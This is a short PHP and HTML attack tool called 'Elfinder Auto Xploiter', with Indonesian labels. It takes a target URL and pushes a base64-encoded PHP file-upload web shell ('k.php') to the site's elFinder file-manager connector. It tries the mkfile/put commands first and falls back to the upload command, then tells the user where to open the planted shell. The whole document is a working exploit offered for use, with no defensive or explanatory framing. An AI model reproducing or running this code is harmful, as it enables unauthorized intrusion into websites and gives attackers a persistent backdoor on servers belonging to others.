Elfinder Auto Xploiter [ Single Xploiter ]

1. <html>
2. <form method="post">
3. Target: <input type="text" name="target" size="35" height="10" placeholder="http://www.target.com/">
4. <input type="submit" name="x" value="hajar">
5. </form>
6. </html>
7. <?php
8. function ngirim($url, $isi) {
9. $ch = curl_init ("$url");
10.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
11.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
12.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
13.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
14.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
15.       curl_setopt ($ch, CURLOPT_POST, 1);
16.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
17.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
18.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
19. $data3 = curl_exec ($ch);
20. return $data3;
21. }
22. $target = $_POST['target'];
23. if($_POST['x']) {
24.     $nama_doang = "k.php";
25.     $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
26.     $decode_isi = base64_decode($isi_nama_doang);
27.     $encode = base64_encode($nama_doang);
28.     $fp = fopen($nama_doang,"w");
29.     fputs($fp, $decode_isi);
30.     echo "[+] $target <br>";
31.     echo "[+] Upload[1] ......<br>";
32.     $url_mkfile = "$target?cmd=mkfile&name=$nama_doang&target=l1_Lw";
33.     $b = file_get_contents("$url_mkfile");
34.     $post1 = array(
35.             "cmd" => "put",
36.             "target" => "l1_$encode",
37.             "content" => "$decode_isi",
38.             );
39.     $post2 = array(
40.             "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
41.             "upload[]" => "@$nama_doang",);
42.     $output_mkfile = ngirim("$target", $post1);
43.     if(preg_match("/$nama_doang/", $output_mkfile)) {
44.         echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br>";
45.     } else {
46.         echo "# Upload Failed 1 <br># Uploading 2..<br>";
47.         $upload_ah = ngirim("$target?cmd=upload", $post2);
48.         if(preg_match("/$nama_doang/", $upload_ah)) {
49.             echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br>";
50.         } else {
51.             echo "# Upload Failed 2<br><br>";
52.         }
53.     }
54. }
55. ?>